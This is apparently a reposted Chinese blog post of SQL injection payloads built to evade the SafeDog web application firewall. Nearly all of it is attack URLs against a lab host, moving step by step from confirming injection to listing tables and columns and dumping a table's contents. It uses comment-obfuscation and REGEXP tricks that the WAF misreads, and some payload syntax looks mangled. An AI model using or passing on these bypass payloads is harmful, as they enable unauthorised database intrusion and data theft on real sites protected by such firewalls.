原文出处:sql注入bypass最新版某狗 (qq.com)
and绕过
http://192.168.111.16/index.php?id=1%20and%20/!500011/=/!500011/
http://192.168.111.16/index.php?id=1%20and%20/!500011/=/!500012/
http://192.168.111.16/index.php?id=if((1=2),1,1)
http://192.168.111.16/index.php?id=1%20and/%!%22//1=1%20--%20+order by 绕过
/*%!*干扰
http://192.168.111.16/index.php?id=1/%2a%%2f/order/%2f%2f/by/%2f%2f/2
union select 绕过
获取当前数据库和用户
数据库同理
http://192.168.111.16/index.php?id=-1/%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,database(/%2f%2f/)
获取数据库表
http://192.168.111.16/index.php?id=1/%2a%%2f/union/%2f%2f//!50441select//%2f%2f/1,group_concat(table_name)%20from%20information_schema.tables%20where%20/wad/table_schema=database(////)
不拦截
http://192.168.111.16/index.php?id=-1%20/%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(table_name),3%20%20%0a%20%20from%20information_schema.tables%20where%20table_schema=database(////)
拦截
http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(table_name),3 %0a from information_schema.tables where table_schema=database(////)
这里其实REGEXP "[…任意%23]"就行,在url解码%23变成了#,安全狗认为后面全都成为了注释符,带入到mysql层面其实%23只是正则的一个参数并不是注释符
获取表字段
http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,group_concat(column_name),3 %0a from information_schema.columns where table_name="newss"
获取数据
http://192.168.111.16/index.php?id=-1 REGEXP "[…%0a%23]" /%2a%%2f/union/%2f%2f//!50144select//%2f%2f/1,content,3 %0a from newss
最后
以上就是苹果大炮最近收集整理的关于sql bypass 安全狗(最新)的全部内容,更多相关sql内容请搜索靠谱客的其他文章。
发表评论 取消回复